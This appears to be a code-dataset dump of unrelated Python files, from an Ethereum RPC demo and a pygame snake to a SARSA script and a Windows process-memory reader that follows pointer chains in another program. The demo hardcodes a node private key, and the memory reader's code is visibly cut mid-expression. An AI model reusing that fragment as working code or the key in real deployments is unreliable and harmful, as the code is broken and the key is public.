text.upper()\n\npyperclip.copy(text)\n","sub_path":"Automate_boring_stuff/bulletPointAdder.py","file_name":"bulletPointAdder.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"498123636","text":"\"\"\"\nA simple JSON-RPC server that only responds to eth_getBlockByNumber and eth_getBlockByHash\ncalls. It uses the LightChain to sync headers as they're announced and fetches blocks on demand\nas RPC calls ask for them.\n\"\"\"\nimport asyncio\nimport logging\n\nimport rlp\n\nfrom aiohttp import web\nfrom aiohttp.web_exceptions import HTTPMethodNotAllowed\n\nfrom eth_utils import decode_hex, encode_hex\n\nfrom eth_keys import keys\n\nfrom evm.chains.mainnet import MAINNET_VM_CONFIGURATION\nfrom evm.chains.ropsten import (\n ROPSTEN_GENESIS_HEADER,\n ROPSTEN_NETWORK_ID,\n)\nfrom evm.p2p import ecies\nfrom evm.p2p import kademlia\nfrom evm.p2p.constants import HANDSHAKE_TIMEOUT\nfrom evm.p2p.lightchain import (\n LightChain,\n OnDemandDataBackend,\n)\nfrom evm.p2p.peer import (\n handshake,\n LESPeer,\n)\nfrom evm.utils.numeric import int_to_big_endian\n\n\n# Change the values below to connect to a node on a different network or IP address.\nGENESIS_HEADER = ROPSTEN_GENESIS_HEADER\nNETWORK_ID = ROPSTEN_NETWORK_ID\n# The pubkey for the local node we'll connect to. 
Simply pass the hex string below to\n# geth using the \"-nodekeyhex\" argument.\nNODE_ID = keys.PrivateKey(decode_hex(\n \"45a915e4d060149eb4365960e6a7a45f334393093061116b197e3240065ff2d8\")).public_key\nNODE_ADDR = kademlia.Address('127.0.0.1', 30303, 30303)\n\n\nclass App(web.Application):\n allowed_methods = ['eth_getBlockByNumber', 'eth_getBlockByHash']\n\n def __init__(self, chain):\n super(App, self).__init__()\n self.chain = chain\n self.router.add_post('/', self.handle)\n self.on_startup.append(self.connect_peer)\n self.on_shutdown.append(self.stop_chain)\n\n @asyncio.coroutine\n def handle(self, request):\n body = yield from request.json()\n req_id = body['id']\n method = body['method']\n hash_or_number, _ = body['params']\n if method == 'eth_getBlockByNumber':\n if hash_or_number == \"latest\":\n head = self.chain.get_canonical_head()\n number = head.block_number\n else:\n number = int(hash_or_number, 16)\n block = yield from self.chain.get_canonical_block_by_number(number)\n elif method == 'eth_getBlockByHash':\n block_hash = decode_hex(hash_or_number)\n block = yield from self.chain.get_block_by_hash(block_hash)\n else:\n raise HTTPMethodNotAllowed(method, self.allowed_methods)\n\n block_dict = self._block_to_dict(block)\n response = {\"jsonrpc\": \"2.0\", \"id\": req_id, \"result\": block_dict}\n return web.json_response(response)\n\n @asyncio.coroutine\n def connect_peer(self, app):\n return self.chain.on_demand_data_backend.get_peer()\n\n @asyncio.coroutine\n def stop_chain(self, app):\n return self.chain.stop()\n\n def _block_to_dict(self, block):\n logs_bloom = encode_hex(int_to_big_endian(block.header.bloom))[2:]\n logs_bloom = '0x' + logs_bloom.rjust(512, '0')\n return {\n \"difficulty\": hex(block.header.difficulty),\n \"extraData\": encode_hex(block.header.extra_data),\n \"gasLimit\": hex(block.header.gas_limit),\n \"gasUsed\": hex(block.header.gas_used),\n \"hash\": encode_hex(block.header.hash),\n \"logsBloom\": logs_bloom,\n \"mixHash\": encode_hex(block.header.mix_hash),\n \"nonce\": encode_hex(block.header.nonce),\n \"number\": hex(block.header.block_number),\n \"parentHash\": encode_hex(block.header.parent_hash),\n \"receiptsRoot\": encode_hex(block.header.receipt_root),\n \"sha3Uncles\": encode_hex(block.header.uncles_hash),\n \"stateRoot\": encode_hex(block.header.state_root),\n \"timestamp\": hex(block.header.timestamp),\n \"totalDifficulty\": hex(self.chain.chaindb.get_score(block.hash)),\n \"transactions\": [encode_hex(tx.hash) for tx in block.transactions],\n \"transactionsRoot\": encode_hex(block.header.transaction_root),\n \"uncles\": [encode_hex(uncle.hash) for uncle in block.uncles],\n \"size\": hex(len(rlp.encode(block))),\n \"miner\": encode_hex(block.header.coinbase),\n }\n\n\nclass SinglePeerOnDemandDataBackend(OnDemandDataBackend):\n\n def __init__(self, chaindb):\n self.chaindb = chaindb\n self.privkey = ecies.generate_privkey()\n self._peer = None\n\n @asyncio.coroutine\n def get_peer(self):\n remote = kademlia.Node(NODE_ID, NODE_ADDR)\n if self._peer is None or self._peer.is_finished:\n self._peer = yield from asyncio.wait_for(\n handshake(remote, self.privkey, LESPeer, self.chaindb, NETWORK_ID),\n HANDSHAKE_TIMEOUT)\n asyncio.ensure_future(self._peer.start())\n return self._peer\n\n @asyncio.coroutine\n def stop(self):\n if self._peer is not None and not self._peer.is_finished:\n yield from self._peer.stop()\n\n\nDemoLightChain = LightChain.configure(\n 'RPCDemoLightChain',\n vm_configuration=MAINNET_VM_CONFIGURATION,\n 
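# --- Hedged aside: _block_to_dict above left-pads the 2048-bit logs bloom
# to the fixed 512 hex characters JSON-RPC clients expect. An equivalent
# padding step in isolation (illustrative, using only the stdlib):
def bloom_hex(bloom_int):
    return "0x" + format(bloom_int, "x").rjust(512, "0")

# bloom_hex(0) -> '0x000...0' (514 characters in total, '0x' included)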
on_demand_data_backend_class=SinglePeerOnDemandDataBackend,\n network_id=NETWORK_ID,\n)\n\n\nif __name__ == '__main__':\n import argparse\n from evm.db.backends.level import LevelDB\n from evm.db.chain import BaseChainDB\n from evm.exceptions import CanonicalHeadNotFound\n logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-db', type=str, required=True)\n args = parser.parse_args()\n\n chaindb = BaseChainDB(LevelDB(args.db))\n try:\n chaindb.get_canonical_head()\n except CanonicalHeadNotFound:\n # We're starting with a fresh DB.\n chain = DemoLightChain.from_genesis_header(chaindb, GENESIS_HEADER)\n else:\n # We're reusing an existing db.\n chain = DemoLightChain(chaindb)\n\n app = App(chain)\n web.run_app(app, port=8080)\n","sub_path":"evm/rpc/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"439308371","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of Invenio.\n# Copyright (C) 2016-2021 CERN.\n#\n# Invenio is free software; you can redistribute it and/or modify it\n# under the terms of the MIT License; see LICENSE file for more details.\n\n\"\"\"Invenio Communities Service API.\"\"\"\n\nfrom elasticsearch_dsl import Q\nfrom invenio_db import db\nfrom invenio_records_resources.services.base import LinksTemplate\nfrom invenio_records_resources.services.records import RecordService\nfrom marshmallow.exceptions import ValidationError\n\n\nclass CommunityService(RecordService):\n \"\"\"community Service.\"\"\"\n\n def __init__(self, config, files_service=None):\n \"\"\"Constructor for CommunityService.\"\"\"\n super().__init__(config)\n self._files = files_service\n\n @property\n def files(self):\n \"\"\"Community files service.\"\"\"\n return self._files\n\n def search_user_communities(\n self, identity, params=None, es_preference=None, **kwargs):\n \"\"\"Search for records matching the querystring.\"\"\"\n self.require_permission(identity, 'search_user_communities')\n\n # Prepare and execute the search\n params = params or {}\n search_result = self._search(\n 'search',\n identity,\n params,\n es_preference,\n extra_filter=Q(\n \"term\",\n **{\"access.owned_by.user\": identity.id}\n ),\n permission_action='read',\n **kwargs).execute()\n\n return self.result_list(\n self,\n identity,\n search_result,\n params,\n links_tpl=LinksTemplate(self.config.links_user_search, context={\n \"args\": params\n }),\n links_item_tpl=self.links_item_tpl,\n )\n\n def rename(self, id_, identity, data, revision_id=None, raise_errors=True):\n \"\"\"Rename a community.\"\"\"\n record = self.record_cls.pid.resolve(id_)\n\n self.check_revision_id(record, revision_id)\n\n # Permissions\n self.require_permission(identity, \"rename\", record=record)\n\n if 'id' not in data:\n raise ValidationError(\n 'Missing data for required field.',\n field_name='id',\n )\n\n data, errors = self.schema.load(\n data,\n context={\"identity\": identity},\n raise_errors=raise_errors, # if False, flow is continued with\n schema_args={'partial': True} # data only containing valid data,\n # but errors are reported\n ) # (as warnings)\n\n # Run components\n for component in self.components:\n if hasattr(component, 'rename'):\n component.rename(identity, data=data, record=record)\n\n record.commit()\n db.session.commit()\n\n if self.indexer:\n self.indexer.index(record)\n\n return self.result_item(\n self,\n 
identity,\n            record,\n            links_tpl=self.links_item_tpl,\n        )\n\n    def read_logo(self, id_, identity):\n        \"\"\"Read the community's logo.\"\"\"\n        record = self.record_cls.pid.resolve(id_)\n        self.require_permission(identity, 'read', record=record)\n        logo_file = record.files.get('logo')\n        if logo_file is None:\n            raise FileNotFoundError()\n        return self.files.file_result_item(\n            self.files,\n            identity,\n            logo_file,\n            record,\n            links_tpl=self.files.file_links_item_tpl(id_),\n        )\n\n    def update_logo(self, id_, identity, stream, content_length=None):\n        \"\"\"Update the community's logo.\"\"\"\n        record = self.record_cls.pid.resolve(id_)\n        self.require_permission(identity, 'update', record=record)\n\n        record.files['logo'] = stream\n        record.commit()\n        db.session.commit()\n        return self.files.file_result_item(\n            self.files,\n            identity,\n            record.files['logo'],\n            record,\n            links_tpl=self.files.file_links_item_tpl(id_),\n        )\n\n    def delete_logo(self, id_, identity):\n        \"\"\"Delete the community's logo.\"\"\"\n        record = self.record_cls.pid.resolve(id_)\n        deleted_file = record.files.pop('logo', None)\n        if deleted_file is None:\n            raise FileNotFoundError()\n        record.commit()\n        db.session.commit()\n        return self.files.file_result_item(\n            self.files,\n            identity,\n            deleted_file,\n            record,\n            links_tpl=self.files.file_links_item_tpl(id_),\n        )\n","sub_path":"invenio_communities/communities/services/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":4665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"163393499","text":"import os, os.path, re\n\nrootDir = '.' # look down from this directory\noutputFile = 'strings.csv' # output table of strings to this file\n# The named groups below (quote, words, tag, innerHTML) are required by the\n# group() calls further down; they had been stripped from this copy of the\n# file and are reconstructed here.\npattern1 = \"(?P<quote>['\\\"`])(?P<words>.*?)(?P=quote)\"\npattern2 = \"<(?P<tag>[A-Za-z\\\\-]+).*?>(?P<innerHTML>.*?)<\\\\/(?P=tag)>\"\npattern3 = \"@{4}.*?\\\\?>\"\npattern4 = \"@{4}[^(?>)]*\"\ninString = re.compile(pattern1)\ninTags = re.compile(pattern2, re.DOTALL)\ninPhp = re.compile(pattern3, re.DOTALL)\nphpNoEnd = re.compile(pattern4, re.DOTALL)\noutputDelimiter = ','\nStringArray = [['filename', 'line#', 'index/pos', 'type', 'string', 'length', 'line']] # format: filename, line#, quotIndex, quotType, string, length of string, line\n\ndef quotType(st):\n    if st == '\"':\n        return \"DQ\"\n    elif st == \"'\":\n        return \"SQ\"\n    elif st == '`':\n        return \"BQ\"\n    elif st == '>':\n        return \"HTML\"\n    else:\n        return \"Unknown\"\n\n\ndef CheckContent(fname, st, pos=0):\n    #print st\n    if len(st) < 1:\n        return True\n    global inTags, StringArray\n    res = True\n    nFound = 0\n    for cont in inTags.finditer(st):\n        nFound += 1\n        if not (CheckContent(fname, cont.group(\"innerHTML\"), cont.start(\"innerHTML\")+pos)):\n            # Append full 7-column rows so saveTheWorld() can index the\n            # length and line columns for these entries as well.\n            StringArray += [[fname, 'pos', cont.start(\"innerHTML\")+pos, quotType('>'), cont.group(\"innerHTML\"), len(cont.group(\"innerHTML\")), '']]\n    if nFound == 0:\n        res = False\n    return res\n\ndef CheckTheFile(fname):\n    global inPhp, StringArray\n    f = open(fname)\n    Content = f.read()\n    f.close()\n    # The replace() arguments and the loop below were lost in this copy;\n    # masking PHP open tags with '@@@@' is inferred from pattern3/pattern4.\n    c = Content.replace(\"<?php\", \"@@@@\").replace(\"<?\", \"@@@@\")\n    for m in inPhp.finditer(c):\n        if not CheckContent(fname, m.group(), m.start()):\n            StringArray += [[fname, 'pos', m.start(), quotType('>'), m.group(), len(m.group()), '']]\n\n\ndef pullTheStrings(filename):\n    global StringArray, inString\n    # extract all between quotes and put into an array\n    f = open(filename,'r')\n    lines = f.readlines()\n    f.close()\n    lineCount = 0\n    for line in lines:\n        lineCount += 1\n        quotIndex = 0\n        for mo in inString.finditer(line):\n            #print (mo.group(\"quote\"))\n            if len(mo.group(\"words\")) > 0:\n                StringArray += [[filename, lineCount, quotIndex, quotType(mo.group(\"quote\")), mo.group(\"words\"), len(mo.group(\"words\")), line.replace('\\r', '').replace('\\n','') ]]\n                quotIndex += 1\n    #alllines = '\\n'.join(lines)\n\n    #print (filename + ', ' + repr(lineCount))\n
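\n# Illustrative check of the two reconstructed patterns above (these example\n# lines are not from the original script; inputs and outputs are a sketch):\n#   inString.findall('var s = \"hi\";')  ->  [('\"', 'hi')]\n#   inTags.findall('<b>bold</b>')      ->  [('b', 'bold')]\n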
\n\ndef saveTheWorld():\n    # save the array as a .csv file\n    global outputFile, StringArray\n    SaveString = ''\n    for line in StringArray:\n        if len(line[4]) > 1 and line[0].find(line[4]) == -1 :\n            SaveString += '\"' + line[0] + '\"' + outputDelimiter + '' + repr(line[1]) + '' + outputDelimiter + '' + repr(line[2]) + '' + outputDelimiter + '' + line[3] + '' + outputDelimiter + '\"' + line[4].replace('\"', '\"\"') + '\"' + outputDelimiter + '' + repr(line[5]) + '' + outputDelimiter + '\"' + line[6].replace('\"', '\"\"') +'\"\\n'\n    f = open(outputFile, 'w')\n    f.write(SaveString)\n    f.close()\n    #print \"Saved to [\" + outputFile + ']'\n    #print repr(StringArray)\n\nfor root, dirs, files in os.walk(rootDir):\n    for fname in files:\n        if os.path.splitext(fname)[1] in ['.php', '.js', '.css', '.sql']:\n            pullTheStrings(os.path.join(root,fname))\n        if os.path.splitext(fname)[1] in ['.php']:\n            CheckTheFile(os.path.join(root,fname))\nsaveTheWorld()\n\n#print (pattern1)\n","sub_path":"PullTheStrings.py","file_name":"PullTheStrings.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"211002672","text":"from math import sqrt\n\ndef cross(p0, p1, p2):\n    x0, y0 = p0\n    x1, y1 = p1\n    x2, y2 = p2\n    x1 -= x0\n    x2 -= x0\n    y1 -= y0\n    y2 -= y0\n    return x1*y2 - x2*y1\n\ndef dot(p0, p1, p2):\n    x0, y0 = p0\n    x1, y1 = p1\n    x2, y2 = p2\n    x1 -= x0\n    x2 -= x0\n    y1 -= y0\n    y2 -= y0\n    return x1*x2 + y1*y2\n\ndef dist2(p0, p1):\n    x0, y0 = p0\n    x1, y1 = p1\n    return (x1-x0)**2 + (y1 - y0)**2\n\ndef collision_ll(s0, s1, t0, t1):\n    return cross(s0, s1, t0)*cross(s0, s1, t1) < 0 and cross(t0, t1, s0) * cross(t0, t1, s1) < 0\n\ndef dist_lp(S, E, P):\n    # distance from point P to segment S-E\n    dd = dist2(S, E)\n    if 0 <= dot(S, E, P) <= dd:\n        return abs(cross(S, E, P))/sqrt(dd)\n    return sqrt(min(dist2(S, P), dist2(E, P)))\n\ndef dist_ll(s0, s1, t0, t1):\n    # distance between segments s0-s1 and t0-t1 (0 if they intersect)\n    if collision_ll(s0, s1, t0, t1):\n        return 0\n    return min(\n        dist_lp(s0, s1, t0),\n        dist_lp(s0, s1, t1),\n        dist_lp(t0, t1, s0),\n        dist_lp(t0, t1, s1)\n    )\n\nn = int(input())\nfor i in range(n):\n    x0,y0,x1,y1,X0,Y0,X1,Y1 = map(int,input().split())\n    print(\"%.010f\"%dist_ll((x0,y0), (x1,y1), (X0,Y0),(X1,Y1)))\n","sub_path":"advanced/distance.py","file_name":"distance.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"537004531","text":"import pygame\npygame.init()\n\nwhite = (255,255,255)\nblack = (0,0,0)\nred = (255,0,0)\n\ngameDisplay = pygame.display.set_mode((1280,720))\npygame.display.set_caption(\"Oli Snake\")\nclock = pygame.time.Clock()\n\ngameExit = False\n\nlead_x = 600\nlead_y = 300\nlead_x_change = 0\n\nwhile not gameExit:\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            gameExit = True\n        if event.type == pygame.KEYDOWN:\n            if event.key == pygame.K_LEFT:\n                lead_x_change = -10\n            if event.key == pygame.K_RIGHT:\n                lead_x_change = 10\n\n    lead_x += lead_x_change\n\n    gameDisplay.fill(white)\n\n    gameDisplay.fill(black, rect=[lead_x,lead_y,100,100])\n\n    pygame.display.update()\n    clock.tick(30)  # cap the frame rate so movement speed is predictable\n\npygame.quit()\nquit()\n","sub_path":"Oli_Snake/Oli Snake.py","file_name":"Oli Snake.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"636017157","text":"# -*- coding: utf-8 -*-\nfrom openprocurement.api.utils import (\n    json_view,\n)\nfrom openprocurement.api.validation import (\n    validate_file_update,\n    
validate_patch_document_data,\n validate_file_upload,\n)\nfrom openprocurement.tender.core.views.document import CoreDocumentResource\nfrom openprocurement.tender.openeu.utils import qualifications_resource\nfrom openprocurement.tender.openeu.validation import (\n validate_qualification_document_operation_not_in_pending,\n validate_qualification_document_operation_not_in_allowed_status,\n validate_qualification_update_with_cancellation_lot_pending,\n)\n\n\n@qualifications_resource(\n name=\"aboveThresholdEU:Tender Qualification Documents\",\n collection_path=\"/tenders/{tender_id}/qualifications/{qualification_id}/documents\",\n path=\"/tenders/{tender_id}/qualifications/{qualification_id}/documents/{document_id}\",\n procurementMethodType=\"aboveThresholdEU\",\n description=\"Tender qualification documents\",\n)\nclass TenderQualificationDocumentResource(CoreDocumentResource):\n container = \"documents\"\n context_name = \"tender_qualification\"\n\n def set_doc_author(self, doc):\n doc.author = self.request.authenticated_role\n return doc\n\n @json_view(\n permission=\"upload_qualification_documents\",\n validators=(\n validate_file_upload,\n validate_qualification_update_with_cancellation_lot_pending,\n validate_qualification_document_operation_not_in_allowed_status,\n validate_qualification_document_operation_not_in_pending,\n ),\n )\n def collection_post(self):\n \"\"\"Tender Qualification Document Upload\n \"\"\"\n return super(TenderQualificationDocumentResource, self).collection_post()\n\n @json_view(\n validators=(\n validate_file_update,\n validate_qualification_update_with_cancellation_lot_pending,\n validate_qualification_document_operation_not_in_allowed_status,\n validate_qualification_document_operation_not_in_pending,\n ),\n permission=\"upload_qualification_documents\",\n )\n def put(self):\n \"\"\"Tender Qualification Document Update\"\"\"\n return super(TenderQualificationDocumentResource, self).put()\n\n @json_view(\n content_type=\"application/json\",\n validators=(\n validate_patch_document_data,\n validate_qualification_update_with_cancellation_lot_pending,\n validate_qualification_document_operation_not_in_allowed_status,\n validate_qualification_document_operation_not_in_pending,\n ),\n permission=\"upload_qualification_documents\",\n )\n def patch(self):\n \"\"\"Tender Qualification Document Update\"\"\"\n return super(TenderQualificationDocumentResource, self).patch()\n","sub_path":"src/openprocurement/tender/openeu/views/qualification_document.py","file_name":"qualification_document.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"604395853","text":"#! 
/usr/bin/python2.7\nimport datetime\nimport os\n\nimport pymongo\nimport shapefile\n\n# Local configuration variable indicating where the split country shapefiles\n# are located.\nBASE_PATH = os.path.join(os.path.dirname(__file__), os.pardir, 'data',\n 'CShapes_date')\n\n# Connect to the database\nclient = pymongo.MongoClient(os.environ['INTERNATIONAL_RIVERS_MONGO_URI'])\ndb = client.internationalrivers\n\n# Retrieve the collection for country layer information\ncountry_layer_collection = db.countrylayer\n\n# Iterate over all the available country shapefiles and retrieve their\n# validity dates following the format of CShapes__.shp\n# where start_date and end_date are formatted as %d_%m_%y.\nfor filename in os.listdir(BASE_PATH):\n if filename.endswith('.shp'):\n # Parse the filename\n tokens = filename[:-4].split('_')\n start_date = datetime.datetime.strptime(\n '.'.join(tokens[1:4]), '%d.%m.%y')\n end_date = datetime.datetime.strptime(\n '.'.join(tokens[4:7]), '%d.%m.%y')\n\n # Handle the years before 2000, datetime sets all to the current\n # century.\n if start_date.year > 2010:\n start_date = start_date.replace(year=start_date.year - 100)\n if end_date.year > 2010:\n end_date = end_date.replace(year=end_date.year - 100)\n\n # Build the record and store it.\n record = {\n 'startDate': start_date,\n 'endDate': end_date,\n 'layer': filename[:-4]\n }\n country_layer_collection.insert(record)\n\n# Iterate over all the country shape polygons and retrieve all the feature\n# data associated with it in the shape file. Parse the types appropriately\n# to python types and store it in the database in a separate collection.\ncountry_shapes = shapefile.Reader('data/CShapes.shp')\n\n# Retrieve the collection for country data\nc_collection = db.country\n\nfields = country_shapes.fields\n\nfor shape_record in country_shapes.shapeRecords():\n shape = shape_record.shape\n record = shape_record.record\n document = {}\n start_date = [None, None, None]\n end_date = [None, None, None]\n for field_data, record_item in zip(fields[1:], record):\n field_name = field_data[0]\n field_type = field_data[1]\n field_float = field_data[3]\n if field_type == 'C' or field_name == 'FEATUREID':\n document[field_name] = str(record_item)\n elif field_type == 'N':\n if field_float != 0 and not field_name.startswith('GW'):\n document[field_name] = float(record_item)\n else:\n document[field_name] = int(record_item)\n if field_name == 'COWSYEAR':\n start_date[0] = int(record_item)\n elif field_name == 'COWSMONTH':\n start_date[1] = int(record_item)\n elif field_name == 'COWSDAY':\n start_date[2] = int(record_item)\n elif field_name == 'COWEYEAR':\n end_date[0] = int(record_item)\n elif field_name == 'COWEMONTH':\n end_date[1] = int(record_item)\n elif field_name == 'COWEDAY':\n end_date[2] = int(record_item)\n document['COWS'] = datetime.datetime(*start_date)\n document['COWE'] = datetime.datetime(*end_date)\n c_collection.insert(document)\n\n# Iterate over all the basin shape polygons and retrieve all the feature data\n# associated with it in the shape file. 
Store the polygon as a GeoJSON in the\n# database.\nbasin_shapes = shapefile.Reader('data/WorldBasins.shp')\n\n# Retrieve the collection for basin data\nb_collection = db.basin\n\nfields = basin_shapes.fields\n\nfor shape_record in basin_shapes.shapeRecords():\n shape = shape_record.shape\n record = shape_record.record\n document = {}\n for field_data, record_item in zip(fields[1:], record):\n field_name = field_data[0]\n field_type = field_data[1]\n field_float = field_data[3]\n if field_type == 'C' or field_name == 'Basin_ID':\n document[field_name] = str(record_item)\n elif field_type == 'N':\n if field_float != 0:\n document[field_name] = float(record_item)\n else:\n document[field_name] = int(record_item)\n #document['shape'] = shape.__geo_interface__\n b_collection.insert(document)\n\n# Iterate over all the basin-country intersection polygons and retrieve all\n# the feature data associated with them. Store the data in the appropriate\n# collection in the database.\ncountry_basin_intersections = shapefile.Reader('data/CNTRY_BAS.shp')\n\n# Retrieve the collection for country-basin intersections data\ncbi_collection = db.countrybasinintersection\n\nfields = country_basin_intersections.fields\n\nfor shape_record in country_basin_intersections.shapeRecords():\n shape = shape_record.shape\n record = shape_record.record\n document = {}\n for field_data, record_item in zip(fields[1:], record):\n field_name = field_data[0]\n field_type = field_data[1]\n field_float = field_data[3]\n if field_type == 'C' or field_name == 'Basin_ID' or\\\n field_name == 'FEATUREID' or field_name == 'BC_ID':\n document[field_name] = str(record_item)\n elif field_type == 'N':\n if field_float != 0:\n document[field_name] = float(record_item)\n else:\n document[field_name] = int(record_item)\n cbi_collection.insert(document)\n","sub_path":"scripts/store_data_in_mongodb.py","file_name":"store_data_in_mongodb.py","file_ext":"py","file_size_in_byte":5460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"120577460","text":"from ctypes import *\nfrom ctypes.wintypes import *\nimport psutil, platform, win32api, win32process, struct, sys\n\nclass ProcessMemory():\n def __init__(self):\n self.WinAPI = self.WinAPI()\n\n self.processPid = -1\n self.processHandler = None\n self.modules = []\n self.IsHooked = False\n\n def getpid(self, nameprocess: str):\n for process in psutil.process_iter():\n try:\n if nameprocess in process.name():\n return process.pid\n except (PermissionError, psutil.AccessDenied):\n continue\n return -1\n\n def HookProcess(self, name: str):\n self.IsHooked = self.processHandler != None and psutil.pid_exists(self.processPid)\n if not self.IsHooked:\n self.processPid = self.getpid(name)\n if self.processPid != -1:\n self.processHandler = win32api.OpenProcess(0x410, 0, self.processPid)\n if self.processHandler != None and psutil.pid_exists(self.processPid):\n moduleIds = win32process.EnumProcessModulesEx(self.processHandler, 0x3)\n if len(moduleIds) > 0:\n for moduleId in moduleIds:\n moduleName = self.WinAPI.GetModuleBaseName(self.processHandler, c_void_p(moduleId))\n moduleInfo = self.WinAPI.GetModuleInformation(self.processHandler, c_void_p(moduleId))\n m = self.Module()\n m.BaseAddress = moduleInfo.BaseAddress\n m.Name = moduleName\n self.modules.append(m)\n self.IsHooked = True\n return self.IsHooked\n\n def ReadPointer(self, address: int, offsets: list, numBytes: int):\n if self.processHandler == None or address == 0:\n return 0\n \n for ofs in 
offsets[:-1]:\n            buffer = self.Read(address + ofs, 4)\n            # Each hop in the offset chain dereferences a 4-byte
 little-endian pointer.\n            address = struct.unpack('<I', buffer)[0]\n\n        last = offsets[-1] if len(offsets) > 0 else 0\n        b = self.Read(address + last, numBytes)\n        return b\n\n    def ReadString(self, address: int):\n        if self.processHandler is None or address == 0:\n            return 0\n\n        stringLength = struct.unpack(' 2**32 else c_ulong()\n        _ReadProcessMemory(processHandle.handle, address, byref(data), sizeof(data), byref(bytesRead))\n        return data\n\n    class Module(Structure):\n        _fields_ = [\n            (\"BaseAddress\", LPVOID), # remote pointer\n            (\"Name\", LPWSTR),\n        ]\n\n    class ModuleInfo(Structure):\n        _fields_ = [\n            (\"BaseAddress\", c_void_p), # remote pointer\n            (\"ModuleSize\", DWORD),\n            (\"EntryPoint\", c_void_p), # remote pointer\n        ]","sub_path":"ProcessMemory.py","file_name":"ProcessMemory.py","file_ext":"py","file_size_in_byte":4625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"526544999","text":"import numpy as np\nimport pandas as pd\nimport time\n\nnp.random.seed(2)\n\nN_STATE = 6\nFRESH_TIME = 0.1\nN_EPISODE = 10  # number of episodes\nACTIONS = ['left', 'right']\nEPI = 0.9  # probability of exploiting the best known action (epsilon-greedy)\nLAMBDA = 0.9  # discount factor\nALPHA = 0.1  # learning rate\n\n\ndef update_env(State, episode, step_cnt):\n    env_list = ['-']*(N_STATE-1) + ['T']\n    if State == 'terminal':\n        interaction = 'Episode %s: total_steps = %s' % (episode, step_cnt)\n        print('\\r{0}'.format(interaction), end='')\n        time.sleep(2)\n        print('\\r                                ', end='')\n    else:\n        env_list[State] = 'o'\n        interaction = ''.join(env_list)\n        print('\\r{0}'.format(interaction), end='')\n        time.sleep(FRESH_TIME)\n\n\ndef build_q_table(actions):\n    table = pd.DataFrame(np.zeros((N_STATE-1, len(actions))), columns=actions)\n    return table\n\n\ndef choose_action(epi, table, state):\n    table_row = table.loc[state, :]\n    # Note: 'table_row.any() is True' would always be False for numpy\n    # booleans, so test truthiness directly.\n    if np.random.rand() < epi and table_row.any():\n        action_res = table_row.idxmax()\n    else:\n        action_res = np.random.choice(ACTIONS)\n    return action_res\n\n\ndef env_forward(action, state):\n    if action == 'left':\n        reward = 0\n        if state != 0:\n            next_state = state - 1\n        else:\n            next_state = state\n    else:\n        if state != N_STATE-2:\n            next_state = state + 1\n            reward = 0\n        else:\n            next_state = 'terminal'\n            reward = 1\n    return next_state, reward\n\n\ndef main_loop():\n    q_table = build_q_table(ACTIONS)\n    for episode in range(N_EPISODE):\n        is_terminal = False\n        state = 0\n        step_counter = 0\n        # choose the action of the first step\n        action = choose_action(EPI, q_table, state)\n        while not is_terminal:  # each step\n            # forward\n            next_state, reward = env_forward(action, state)\n            step_counter += 1\n            # whether terminal\n            if next_state == 'terminal':\n                is_terminal = True\n            # update q table\n            q_now = q_table.loc[state, action]\n            if is_terminal:\n                q_target = reward\n            else:\n                # choose the next action\n                next_action = choose_action(EPI, q_table, next_state)\n                q_target = reward + LAMBDA*q_table.loc[next_state, next_action]\n            q_table.loc[state, action] += ALPHA*(q_target-q_now)\n            # update state and env; on a terminal step there is no next action\n            if not is_terminal:\n                action = next_action\n            state = next_state\n            update_env(state, episode, step_counter)\n        # show q table of each episode\n        print('\\r{0}'.format(q_table))\n        time.sleep(1)\n\n\nif __name__ == '__main__':\n    main_loop()\n","sub_path":"sarsa.py","file_name":"sarsa.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"511455702","text":"###############################################################################\n# This file is part of the ValSimP package.\n# See the package's LICENSE file for copyright and licensing conditions.\n###############################################################################\nimport gzip\n\n__all__ = [\"zopen\", ]\n\n\ndef zopen(fname, mode):\n    \"\"\"Opens a file with gzip if it ends on '.gz', otherwise normally.\n\n    Args:\n        fname: Name of the file to open.\n        mode: File operation mode string.\n\n    Returns:\n        File like object.\n    \"\"\"\n    if fname.endswith(\".gz\"):\n        return gzip.open(fname, mode)\n    else:\n        return open(fname, mode)\n
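\n\n# Example usage (illustrative only; the file name is made up):\n#     with zopen(\"results/run1.dat.gz\", \"rt\") as fh:\n#         first_line = fh.readline()\n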
","sub_path":"src/valsimp/io/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
